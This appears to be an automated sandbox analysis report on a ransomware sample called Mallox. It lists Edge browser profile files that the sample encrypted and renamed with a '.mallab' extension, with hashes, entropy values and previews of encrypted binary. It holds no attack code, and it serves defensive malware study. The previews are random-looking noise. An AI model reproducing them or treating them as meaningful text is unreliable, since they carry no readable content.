                    SSDEEP:12288:TcqnU/4b1N9jS+pHArGbLduNOokOd2sxrREeNz1unqkbt:OAECbLQNN/FRzXCBbt
                    MD5:7ABFD84FB74604BADF3688D537A807F0
                    SHA1:A125A0065EA69610C2F94BEC6106BA7045C7F9D0
                    SHA-256:02E29C4C733CB3A477D1DD61955E41C05142CC322B9EF93D7588968B45B43129
                    SHA-512:35C8A56A9171CB2B5DF5058CAE770CCADE4BFEEFECD60A1E34C86839AC1A2DF3E0E6D5C1CBD747ACD2CBCE089CAA316AB3B48D4F38E1BF7092438F91A22567A0
                    Malicious:false
                    Preview:$fi G...$.@&6r...4t].m.n...........:K.O%...J2....N|z......#......b....|Z@C......C.XH&.:h\3.+....q.f....:V.r..Q..u ..h...E.UC..e...f...}.y...i4...h.s.!.!.m.y..^.....N ...t..8PwI..H..&..`.....)....r8DO......q;y:.EA...qE.;...$l.....Ftn..u|.........8.N.;....Ti.L..~.....n.......e.#...^..T~..j:.;~X..7.;[C.U..x..,.<.~.J...t.....)4...........rY.20....l....>.5P..c...,...ly-..L.S.....|...0..t...zZ...>.*..3k..."%..v..;..gP).5r.k....../.;P..M..."Q.W..}.q..^.2...I./|.}./a..2.&y.j....x..r...!4i./.p.y.i.T..._Ch:N...._.[......@n..V5.Si..'.O.v<.K..m....].$h.w..*.-.r.M.E.X..,.M..&H....1.}.Q.@.P.)..>.gc.N.-..8W.4...$wL..i0...~.}...W.........b..6)....>..j......W.#.u.*P..In......%....:."Qrwu.i...j...l...3.kC..Q..dO...e.7*^..DMq,.C..E...I..!.~..z[..j.q....7........7u..Z.*.*.*,.;......z;..+......$m.]..3F.....F.,<F./............)3Tr......'o..8...R... h..<....*.WC.=Nu.jn.].m.X..8[.7c..8.n=.ZD.3.....P..\.......O!<..S.ms*Zup..e.0.........S..!.V......c.G.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999302188324575
                    Encrypted:true
                    SSDEEP:6144:QAL5dBWSB84aukR7RZCRoOdzIiU3GG7SnIjPeXwyXjQHnmH:QCn84vkX09dzZUWArMdXjgmH
                    MD5:8BEF4EBEAC8B485263E5903FF6C84026
                    SHA1:DE98947C2FC72C4387380561C4FAB0B99B74E564
                    SHA-256:7F06FDEF0F4C98CE652EE377129363D09AE75E336DA65902DAD00A75C6125C61
                    SHA-512:C3E041F4AC8F9393E220717192E8DFECFE37861962EC770A80E8325EC20C31AFA40C94109DC681C4CA8CE9E44C63FE1524EEDE2CB0B9AB1F6651D018CFC92838
                    Malicious:true
                    Preview:...@.j.9..X....:.as..q...9.=t2w;..Zvb.r..M.'.qF.....p.P.U.TY....fu.....F...0...,.......f...2..I.<l..RW.\.V.`N......).sI.z..g)}.....(.$...G.....F..c...'g.^..8...:.M..... ..',./aG)..9...F.g9.S..>e...f.....'QE..k.j{...6Eq..h$k...........9.ju..Z.%.7...m4Y...M..6...$....3.7.J.h'?.V..\7..w...*`;...G(..y..~Ub..T.elnx.........'Df....T._...(Y_..9.....%}3H...d.\q.x..e.........-.H)~jf.3.40..p......3.W..y.Up....F........:..v.2.}.F.f...........fK.8.!.....vs..u.. O ..q.y.@..@:b$)e{.E.=...E..S(.|1C.M...U.f...@.$k..#H..?a.7z.-..g.@... 6..ib.3-.K............Q..Z.>.B=S2..5........0.<..z.B"...L.. p=i.+t.{.O....Q..RZ&r..4.3..N.M......#...]........^.Q^.......d..F,>.9.r.....~.q..yM<.d..U,...i..........#,......L......!..w....8..wD..m.qIj...fW.3....rN.....`.h!.*.$..u.\.....0...;.&.*.:.L.nEg....b.5D...6...N.EeZ..............Y... <F.f...!.L!..6...WlD[..l. ........VG.......k.....%.U".'Wl)....fe^...x.k....X.LrQ.AZ1q.X4.w....N<.E.C4k.[.(L.+..=&..;p.].._.Dj.).d.W]

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.99929807992235
                    Encrypted:true
                    SSDEEP:6144:uOcjXgOeHJBQASmoHTrUfj1fX+FCyNdfzEktn8r8POC:uOA5eHQAfOFC8d7Ekt8rW
                    MD5:9E8DC1126D3F5C51F51AE4EBD4A884BF
                    SHA1:94384F8486BBB591D43BEABEC04C7886C2BBF520
                    SHA-256:C656877BD53C614B7E3D5599BDB7203A3F304C9DA21CDE7778AF7676A723B549
                    SHA-512:3695CE4BA6A63BC5FAC7DFB63EB414571E94B6A5F58A61FD70B1E1226CE6C1AB226BF1337A7613BE87D3F99F8BC53736A4925ED085B550A79B0A0B1A4026DF07
                    Malicious:true
                    Preview:.m.u..,.u....6.....k.?...s.<.\.O...+.......Z.{2..Uv..o.........Or...Z7....(_>....A..t&.-.Ov.......HB9.v......s...a.`L..'.p.........5.em.....2e.....l..sh.].^.H..K....6<..Uo5k......4...m..e.w?.6.|...6J....J^..R.@.t"..Pt..a."..w.`....lO...,.v.9...b._..=y...g........p.V.;m.z`.S.....#.o..*/_.......3.K.D...rU.gW`...Y.9.T..s.;..9...m...f..-.........I...*!7.jZ)+. ..7.Y.......@U.So:;Y.X.14...x.s..cs...D.hV..`.z...3...*...R..`a...<.r...*...d...a..-.H.....:...af}..wU...D1....H...../'..XT.|).Q.kv..K#.,P?.|.ysjv..S.$.W9....+....g.U.L.8.t...J...D..b....R......2..K.{W.\`4Tv\...[ {...}?...&.j9...a.....q)|.M ..^..AwZh..E.;`..za.1$...K.|7.<y..|...`'r.r.c..).x..w.j..../..c..(=..r3...nD.t.W.\c.z.JoC..H..+....CAw!.;).!..#S.D.T...f5........B$....W...1I..*.I1.. ....Mf.B.C....].....:R0..|.......V.....C..\................$.*..Y<hF...p4~...x..{.x...Z..d.D.F.....W.=..XxU.pe.R.*Q.k|.)...[..K.g...];..a^...q.....!.%..T....k3.....!..h9s....S9...#.....b'~..`LB.J.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999384599869517
                    Encrypted:true
                    SSDEEP:6144:wdNGJ5qejv/k8k8UuxXfEW4D/T3WDEpXUhME3ePwZC:w7O5fbkJ8UmP63WABUisez
                    MD5:78B4AED692BF31C0D3AF8CFCEE32CF01
                    SHA1:A53F107A92D3E4A80578FEF2A50C58A9A8264E6D
                    SHA-256:B68878F187BD0374C660446387C1A2CD6648E6C9FF1EF5FFEF2CA2D5F835A927
                    SHA-512:C5CA9BE12CD698C26A3AAB764A5650F8881F88249E24EEAEBE4509F62F03E7702DADA10F8DC0B06A6F305235AA9D1A169DC8DE6A6400012C6A3CCBBB274B7C80
                    Malicious:true
                    Preview:.O.[w .n,M...[.g.z.3Y..k.F|...D.....y.V......~.~D4H...;.ff.....A_.$!....-u......{.@.........H.MW.Z........V[.r...c..^..q....@m....Q...pz.1.P7.<IlV..X...x....y...3^`..1...H...,/;..?...0.U..Dle......S........Hu.e..,.......i.<b.~.hz."...a..w..K......xH.h....kMj|c...^...h....w]..]...0. ....m..A2..M3.....(P....1J.....41.R|.r...^LP....o..=0...MH.-/...w...=.-..6g..t...f..3.....kj.0..eI.j:^..... .s:V~*..(t[J..K.&q.V.N....z....."R.........x..b.U.B.L2.]>.}.....$...6.g.8.r.b.#...l.GA.pq.q..V\p....qB..^y..~........b..EK(b..=...n..!....`-<.o...3...c...f<. (q.7.'......T.z..l...^H....YM..J.\>U...$"..'.Tn...../.Y..."'3y....c...c.=.%Ok....6`..........R.....t..',s&.K......!.O.......f.0]..2.{)......S@Ae..-....x.Re..i[M......pZ...j...)...tD.........`1..L{..L.v..@....-n.|...=[e..........,...3.....O1...>....%..T^.. 0..c(......e;..[z......U....~s..88?.....Q...Zo.i..[...QqyT7.z}.E.......B..u.]...3.........L..2F_.k.P.>X...?.....)J..]Xyq.R.CR.xEL...RW..9

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999247163463315
                    Encrypted:true
                    SSDEEP:3072:vl8wOuWe43ShGaljjADNf4udkHsfnOktIMpKyFelvAhA5h4bklxR3KOR2GoFDn:vl9kSh3lxyOkCNhS+R3f2VFDn
                    MD5:FB5AAA5F40E1D74F324B3D4AE1207823
                    SHA1:3062788441E0F10DB96750CDA32C3ADF0BB3E2FC
                    SHA-256:E8B043DEDED67B80F739130126A1BD3B7E1E32277106D1C6E313910F8DC25816
                    SHA-512:E0775E34D4F8089142F931D3C205FD8B9EE9FC12ACF8259E97808B1BA976FA58EEDDB781001AE9360BE294E3CEE2722C50250C23BE475C24FD1FD64073956F41
                    Malicious:true
                    Preview:...R.O.].}..y.|......F.....|.....2A...w.e....c..y.S.o..=.&q.:8.. ....ybGa....v[.M..x......aX...<Np.F8..B8.a7Vf1.S...... .2.b.C..s1In...[.V.>>.....Q.b..k.G..}..3.o..g.....Z..^...;..Co.Gj.MV...+..As.D).K.r..2.?.-.Qy.(.../.._..2.4..Z.W..Yg...Z..J........c.... ..l............:K.*k!..k.M...@..n...........8..M.....6....;....."J.Q..T|L{...Sk.........!.6M"(.....>.W.....3.....Z9..X.w.....,1..:..2)1....K.%..yg...0....A.I8l.ei1.j.x...A...EZ...ty.#.B..A....w..\D.a.....Q.........{N$......,..8.*X.....B..........._."9He.1odBt.5`@%.....1.].L.=\.....S...+...lV>....Y..1.k#.i....X..:..i.2F$...5.+. .q.$-.W...k..p..~..B...FY...jw".e...KO......h....H..6....c..^.:#.P.........s1Z.Wd/......q.\Y`M.....~..7.-..M...X..z.....7.|..o8...Z...<...^}/D.6..f"D[I....d~x...o.f.L....a..i%7s....'.z..l.W......4.M.T......S.Q.Bu..8.Mq...S.<...S.F..\*.^...4....XRmt<.......e6.._s32.\..2.....\.R.6f..:r..C....{.{V..Q...scE..NoY8\..u..$9.i.......7.z.G.j.=..{Pf.....\.;Yrm

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995028169002615
                    Encrypted:true
                    SSDEEP:768:ac3+MQO8BvH5cccC/H4wP31bmllAia9Tn6ATj5DHecCo18fIAX:aG+NO8ZH5cnC/HJRoAia9Tn/PVhnAX
                    MD5:20F67B87734B867F8254263DCB28CA06
                    SHA1:1C3564607E12FBF28F0FB0A31FC877C1D8BC2729
                    SHA-256:0F08C21569A2E3C1858E57A5FC15FC28858F50E9D5340E0317D6A9126AFF2926
                    SHA-512:F3BBB08D2476BE53816692F6C4A6ADA3272EB1E41137A2A9677C1AEBCE7A7AE5E06B3DBA3C4B4F4A95FC04F487FE40547070DFE3B59516EC5B858C96579C0979
                    Malicious:true
                    Preview:4[..n.O.|n{....,.....&(T].M}&%....g..d{=..........vt.F..fO.u...W=.kP..*.$...Wy...Ra...]..<!#.oA..o.9...D.a_.!.'#.n...H....}.^.~?....c.O.\...Q..C3i...}`.\0.`c.E`..>.p...M}r.x....[....''.Y..........MU..X.1...YTW!........h-.g\.d..c....#"`0.|.+................jy._.A....Ml;.P.L..k...{.~m.U:..W8...c`..C.p'|*.GJJ.4......_....U..t?..J..O.....9.B,.{yb.2N..;.Mdx...T....,...)......9...H....<..+a...[].|..*.....l..^?.W......Kt.zY.@..Uy..f.......2J.n.R.5.Mc.wG.>r.0..E..-..1t........5b..-.^oM_....9..RE..1.!UIf.x*~e.y-..r..o.?.U.q|....c..,..l..]=....K.^sM$..o+).z..dzK.H..r..;.z. W..^m.S:.w_.Ur........].F...m.Oh.,......g......5.@A...sL..v.h...L.Wo.].......(i3j.E...KR$_y...u...o...R+.j..\..2.Am6.B./7.`.....AF..N...@..7.a.W..z!E...M.c..?v....Zp.&F...%.....{...#8....8@B.......*.v/QJ....._\...f..W>..@o..z.F}.G.;{O.|..@...(.......woK_j..[...x..4qg.5eg.e.......>.z.0...cy...........T4...9......C.m<Q.!<.\H..b\....B..ne.v...r..6=U.Ju.t~(.f..M.s.O;.o!.qT!.B.KBW..2.m

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.9947078880706055
                    Encrypted:true
                    SSDEEP:768:vm4eSR6zV8kW3Kc+x87yRuKmtnhOCfBD0biEN3U7WD+4Emog4hFJrrOIM61:vm4bMVp6+e7yRuK+DnEN3noZhbrrPM61
                    MD5:A1C57975C84B2EC43B87665BA4010410
                    SHA1:BAA55E224B1DADEAD7E50157CC41493834CF8D7B
                    SHA-256:2F2023882F51AC8CAF80586384AFE9F0FF0E9A7D12E31C9A96DE62019F69B610
                    SHA-512:C1B82A6079852BED2D70332EADE29365F558E86A596BADA957102B84F2ADC1E18491041AE82C3C73DFA03F86586B6DB99429303054DF488766C276655211618F
                    Malicious:true
                    Preview:#4F..%0:..Wm.=.lj..]G4..!...%.W.Qq.ba.0.|.).1...o~..&.B..T........5{....9..#o..2...../.c?!.."......:.07+...2....>.....L.X~..}N..=f.m..h5....H....x1.(D..[<..H.......W...p.GhT..N.-&....]..F.K[.A..`..\.....u_.nP$...~[...+......<..^..<pQ.z5.f.fO6o...AI....a T...^Jg....N.}....Z.T.d)....z.I.0.n.t..F....3..TW......_:....o...gj.\...D......f.%.5..4.'.%[P...}....Z~..= .P>...&.p.C...y..C...m*..iQG.".l`...Y.5...mw.......+.....E'.O.i...4....J.k.Iq0..\/.,.)&M.&.R..*.7..W..p..t.'es....a.:.x...,qJ..o#.POp....rq....{Pp.3B....n......N.o...F.?...'.. .0h....(.u.......X......8.9......7..,"..&.@b.....@.+g...j!.~|P..5.E.B.|o...<..Ye..H..b<qDL.]..D..3...".......'..+...5M.#t:....]t.){..b.J.D.j.........}@0M`d..N.J. ml0.....uq.7D.<.....B.....y. Z..L...k....n.V...#.C....3.]u<..b.1...o..8......v.Q...n.4Hx&.9w%..U.]Gg....n......%.....,.PR.-s......u....?.3m0....I..~...6&....:7.g.........Q.#..pX^...\.}....o=.z.;r^nGp.Qf..a.P.....d....P.Xmk#T;~.^.s..u.'.g.,.....A.\.:'N.2

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Top Sites.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991340916665921
                    Encrypted:true
                    SSDEEP:384:1U+S0ZwSliq22DIJ+AEqUfOQF5TOjQpttkcAjo4cdRU0enpeQufy8/giZ+:1WGixo1qUfOqsitkm7UnEQ+yf++
                    MD5:965472C05E177228F06C24041ED98527
                    SHA1:D460F73424390FB91B00B700C052C1D9EF11CE62
                    SHA-256:9EF6450E482DC62E96D4FDF255AFAE90DCF9AC1B9A36DBA719AEAC4754D752B1
                    SHA-512:6315B31275AEED23D01526DABA9E35CE761782979A989CA03C0BA4EBAE7EDE82A9B42AD30EE251920A6D63C5910ADAB293A5765C969BD04144C878D86A26578F
                    Malicious:true
                    Preview:.._..c.....3........O-.....y..9.J..0..5..B.1'..m.h.4.n...M...X[....U.3....0..g.]...!E.>O..L...\h..^.l......+.......#l$.4.}n.5............QO.....x.<.]..._+.:.0h....W_.v.%/>.4...QW..=&'....i. m .\...G.J....E...(..j..E..G...*.W..D..w..(..A.]dZ.M....'...]........ ..........."W..".K..xso.y....(("5J..1=|...n]H..L^.2..O.a..u..{C..T.Gn..PL.......1.kO.....b.V../.9.r5e<q..:...G....`s~C=.a.K.A..&.Kz. .T`.$. .[..&..]2<.......z..@d.m..-..x.3..X=..A...r+K..d.T.....l...8....rg....}\..5K...T`.......,qi...({9.Q..3....Rp...'..6..W.&..X*.yw.8.s(..K.|......q/.?..aC..(..........Q..&.@C_...'..~..h9u.U.q...x.*T.....k....l#0KO..\.L..{.R:......<.1......S5.~r..^0._#.".....j..|....4L..v..6{..6'....H..!..&..t....^.s.>...2[.t....u....'Q.e......RO.u.".9.)4u...Cn..*..~:t...9={..I........s....K.}..b.6:|.[q.......}..p,..Xg..i..Q.f.$Oh.&.T.;)4..@.?3...r.O.M................q={...P.r4T.@.GRW...`P..w..)....v...T...2,.8Y.xL...qO.i..Vc......l.eq.........z_U.C.#G.B...sP.F~...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Visited Links.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):131180
                    Entropy (8bit):7.998555575029045
                    Encrypted:true
                    SSDEEP:3072:vShuNanBSLj/RRCkX6j+PUK14lrhfsMf61wk:vShBsWkX6j+M++NUhyk
                    MD5:090D5DCEBFD0BBBBFF8BB1D7A3A057BB
                    SHA1:E4970D810DA617620095AAD16F7181A04DD18156
                    SHA-256:93EF0DF94DD1654E30FE1EF8BD64A9932ECBD92E3BA08061F8D6012434161E0A
                    SHA-512:56EE942BED0F19B5BFF409A4E291F3B009AB1AE117FF8C3F5C33C07F1B7A62C7C91A8B313DBED5E55C54512266C063D152F3F6997E74DD323ECB7111048AD42C
                    Malicious:true
                    Preview:.J4.]..'..*>5........;/...!.o.?...:tO.qz6M\..j.4h.q.........j...G...b_/.~..mv...... ..7.m..UX...8....._.ltr.Y..+o.....V.</Lk...7xt..&>....F2D.w....i+...|l.fM.4m......O.0.........%..;~....=......P....."....h\5!.Z.c...F.........=d...j......*.~...[......o.N.uC..r.H...LV}..:m?0.....>.g..AI./G..f.....:.o.M.&.d^@8..{>Cu.5s.t.M....J.R.....Y........sb%z.m.."...k...L......J......@.t.....8..F.~,..]..hA`x4Z......3C...'..I@.9..Z....MF.q=.gQ..........P....:|.&....f.t.[3....1.S.BxQ...O...d._*3E>6....M...;....@f..O...hL..9.L..%.{t.-..|..*s....t..r.\...'Z......o.tU+fU8.U '...E...YG.yZ%.n...!aG.7.,...o.A.)...^6..3.m..~o...e.9.g^.........i....[...../..3C}..[.>..v~,i.G.....`.i9t.U....o.........$d~._...P.U.v.P.......S....A.......*......m_`L.z..Gt...W..F..k'..../....rD;.....g.../.._..E.`..5uIVd.2 .X2.{..'..t..y#....... I}...6"..jK...!..l.>.'...nv.]z.8..^Q...Y.n.J.....v..x..hBb.....sGv..4~.+x..G.$..V...@^....8.@..k3..y.B.n5...;..L31...Sn./...:@. 5:DlA.,.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Vpn Tokens.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28780
                    Entropy (8bit):7.993436802327989
                    Encrypted:true
                    SSDEEP:768:wCB8RZQcj0/XdN8sGfEBwObE0HOGAt0veQi5YjB:7B8byXdesQWwObEWZA+vyiB
                    MD5:71E3115011FF3D8402DFE553CA9C1AC9
                    SHA1:957108DE2035DA28FC8FBAA6E433FA2161992FEB
                    SHA-256:EFC3EE14623491FD529D008DB1E50A000BD876D06FE4982F5B4FCB307CA21A7D
                    SHA-512:D824912B53F6FEBAD392E67CD30AE869AB0F09679B6E2001CDB92B2317D2335D784CE4696FAE3C15F69D3115281D301DBA5D7ABA061D0266737C52B59351330D
                    Malicious:true
                    Preview:E....Q...>G.+Vz.b..8..pJ..A2.)Qx.@.+*pA.o...7AJ.Dv..W.YP!..MC,.KH.....;.G.+. .p&....B.a~'... 6IU...w.%.........."!...m.9.m..kR......^m.UZ|x..h.l.C6.....L..4..';-a.......1.`EU.\..[...|.............W....@...#p....)@i......B.@..5......[..0.o.....W&...O.Y.............5.JO...o.H.......^..Z#M/y*g...g&.Q.).E.oY.N......~.<......:..B.u.j-Q.h..X:..k{.4.G*...!Ne.!I[.....i...Y..N8..&....._Ah@....u..dM.X....oA.s....M.n\.gF....S(.p.g..pdX....\y......v...N.+.J..2.~s........U..p.....[b..|...5F391.;.^..!<.\....~..x;......x.X:Wi.Y#...I..w......c..,"6..mv.(...EY.q...\...2...B+."..F.&..C...X...B...+.%9.!..pU.jl....P..\..]........?.y..A#.Fp.r.n?~...S....@".v.7Q.....sa.`.T.8.......FH..$.U.G_p.z.z.......1^.-..Y....9^).5.ZdYc.k.:m.....K.......T..!1<qcx|+./...A......m..6m.pr...u...}...v.....y._v.....b..%......-.zp...V..!...t.8kE....Eb....%...../........E.}...!.W.u..".Z......M'.f8..UsGy]...u.NF...U%.p,.....|..mI.d...KuG.......=y..A*6.r..?W.B(.A.$J.6.V.NA....H.{

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Web Data.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):196716
                    Entropy (8bit):7.999114051651172
                    Encrypted:true
                    SSDEEP:3072:2mp2Uu3WoDHtya9KswiMee0/v+NvF0+PGJJoRjgsmQANi47lbjtChQaXEosNCTv:2mp2vmGHt/3w0F/vxJScdRCKafz
                    MD5:92EC9ADA46A31ABFD7D04DF7C689AF9A
                    SHA1:87EFA84E403A19E7D0E0798AE32F0359AEB56400
                    SHA-256:28B3F8420A0B77BC4BE01B94403C5EC7237E19DAE6E0A2FC1394E82947D14732
                    SHA-512:F8961C9C7F07B27BAC863D3B53E1D4A58E678FB03F67DEE7037E7B91216AAF04DDDE649260E572AC61697F2970E9ED3FC3D30F77CF3004F42D54B866B8C2858F
                    Malicious:true
                    Preview:..g.N.]P|..ou.[........}s.....I.._...Lk...F.zK5..$[..h..eK.)....z.{RC.X4J..V2.<H... ..O7.(......Z.JX.@....:.Y...R5.?.rOJ....`=.UQaa....N..w.6.Ub...\.w_./..q.c.%....4.&...NU.....y..]P.@...F...z<...\....5f.Z.H.IdC..}.e..v.m...P.........6xS.<c....C+.e....ic."..1..j.&.0.O.Rm...p..F%..0L..^.^w.....N.......%...k..X.......>\......9.M!L...&.'..|...'(C.2..0a./eM.Mp.|upP.uY.Z....(.--.=.".!8Q.(.W.x.?...A...r..)..9.e..1e=.G..X..+.A.@..;.m...~...kv.g'c...j.%.F.jZ2.<..u.K...1.)q....g.../.....a...u...L...:Mo.l/..~ ....)H....&..'...Z;?..K..lu.%......N.L.....T?....c.zh.=......lR.".'J..$l=.v3.=.M.~ .x.......'|D.~.u....O.h....R(6..2..0..5...j.g..I.D.#aw...[.&.#.B..N...W.RV.&..@{.6...@p34..|.....(..q..m.`y..c.4...B.c.!.......S....'....q.4xkE.......n.Q.[...W.N....Un.dn..K<.|N.0..TWP{.ct+.....!..o.Z.#.=.6.M_o.D,.....|.kvnm..f..2yl<...mY8.....5.}.....j.6...9O.c#.h..P....B-Wm...4)..i...=..`].%Q....L..v..<.l........Nk...NnY....F..O.Rv..M<[.@....b.....A)q.Ts....~..}e.+2

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\WebAssistDatabase.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):14444
                    Entropy (8bit):7.987536772013654
                    Encrypted:false
                    SSDEEP:384:fts5xlL5rSLAs319N8Dlfm16QwPM57YhgF3ShAwoXN:ftSLZSLAu1vM+1xwkWbGwgN
                    MD5:C70EF82F6888CE9500032274525627D0
                    SHA1:D6ECC811D40793A845CFC658D470D2C83BB08D74
                    SHA-256:CD5B49C00624FB74C4E9BE4F48AA3ECDABBE6803C716EA2A88A2DF379B68B495
                    SHA-512:25A5977BD22CE0B9FA239D8F42816F55734257FD36B8C215871F8BBD1A55AF2026D4F6E0F58AC0BDF7DCC6BD16FE048E43F78FAD2B9D0A9A0AA1EF4B3CF9539B
                    Malicious:false
                    Preview:...S......?.v.._..3.a......._.W...y@.O...5V.-3.0..B.Z.....i..._.W.TG.?...{V...Y.+.o...M.}P.W..,.OO..R8c...oz...6h.....>.3.57...e~H...QDY8....0M...yZ....a..E,...B..q)*n.+.....r.R....zT..G.'..O...yd. ..-./..R.Y.....A......8e.;M=.....N.._.......dd..:..d._z...>...<...(.v.=G...%V.......xAc4\.=hq.w...*...^...q....>.>............p\,..h%3@.......c.+'...u..Hj..I.83....0t.H....b.i..!.QG..]...........U.c..u~Jy.....4.~..&....].m.E....k....6...........}.w7.BP;..........k.M.........h..']..{\.l..m..^.1...7.?$.*......`.~....]Z.\.Q`..7...R...l.D...h15.q".F.....c.0.....r.|.g..C.~>.....fP./^1m.>^...........k.......[.P@<.@.k.7.\tL-.5..zwo!_....h..O....Vw.,..h.~....7O4?Hu..u.Vm.Y..O(.E..d..(3....<.Z.........OVtN$f.....1.q.~# ...j.a.Q..y(.i#[......g.A.....K.q.[.M...;....u..........;..WM.....G=...:..y..<.a.N...n.kl.N...jk.@....5.......o....8.].tm..(;......k.^$..M.....P.z...<..9`LG..oOQgI....N...RR.......9._.._(E...]@.Hm..|.....E.x....8Z......QF.U ..U.!7.m.f6.Y

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\arbitration_service_config.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11863
                    Entropy (8bit):7.984589109466564
                    Encrypted:false
                    SSDEEP:192:ft8K80+aZUligjZfxsPW/MJsiKDG7kvYNbQ76VifeUhLiR0yZlyPZdoGb3rupIhq:l8K+aZUYgFuMLDxvUQ76OlhOuqTErueq
                    MD5:919BB65289541F0C852154EB1E575290
                    SHA1:00777EAD0D1E348581AE4EAD766B7B11605E1D17
                    SHA-256:CA2BADBE2E1F93BF47D9D53FDAB715E78D2F7375D5BE776863F3B3F2C7567206
                    SHA-512:6272CBA9C91B50C67DAC4B36297CD4627B02F8122A837F1DFD52E2D7F50E011E337D7F91DE595F0E3BA1EE4D571BE6555C63830BBE6A41CB657A7E70053735A9
                    Malicious:false
                    Preview:...X....o...x....ap.Nz.z....xl..e6<....j=>/*@.........$.=&.-....3.....){]....7.-IG.3f...8Y..{.c..R]A...M..TSF^.*..PV...|.`&.#.;.`....s d.....".....H...v.......b..L.F-.K..t.$B...y..>Z.+....e(.f?.s......D..j.u..6$+. ....#..YA.d....Eo..[....f.....}+s..6..._.. .f.%..9.`.MM..uI7.y...X\$.0E]%'.....V#.ON.l..=A.d..u....S..i....V&?.._...9V.......Xzz.....z..U"..V.J.geA.......rh.S...d!.{.......8...eA.;..~.U....I....`R...S..b.g$e... ....%..fw:.,.d]......q..1...*F/.dq.6~...1.0....!..P..Re.).....`..C........x.!.....d...........b~T.....G.pT'.r..sB_g./..=.}.Ti..!.a.p..1..&.Xa..;o..(..v.........c.!....<....i...?...../.J.]./C .......AS..&Z..J.0...2v#.6..%=.p....v....%.TW.&..I{ 6....K....O.J.:............".,i]R.@...9........>t...W.f..V..4....M...x..bk.:....Ye.`....~.d.tI./*`.4.r.B.P?.].(.oO.).....UR....[tq....?9.y|.....l.r...*...8..n.~.[tI~...]Da).s...go......7.....4.0'......0....c}#....nl.....5u...HA.M4/F.?X......$,2.5...B...`D$.L.....0..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):16492
                    Entropy (8bit):7.988285092099881
                    Encrypted:false
                    SSDEEP:192:km72wrZsClsvge3wbTPzPZA0mf/mXvUcoPwb1zx/Ul84pmSBbxecc0vGp2znvWG:llCbgS8jZ+nkUypx/SpPb1c7ineG
                    MD5:5E55E5F06594FD97CD43B3D4886C6EF8
                    SHA1:8B2A0C78DB1CE317DBB616A0A9D2D5C58F6C7326
                    SHA-256:1AE1EC39154DEA780F1E7A101D2C863B4C4EC624F79473721B045547388F60A6
                    SHA-512:E7735348B0847FC1E91D5DDFEC469D230BA7FD78291364472509894D28B5D61AF56095104660A2A24C093A4A05DFDEE82C6D7EF6EFEF0727D7F911A1019E5DD0
                    Malicious:false
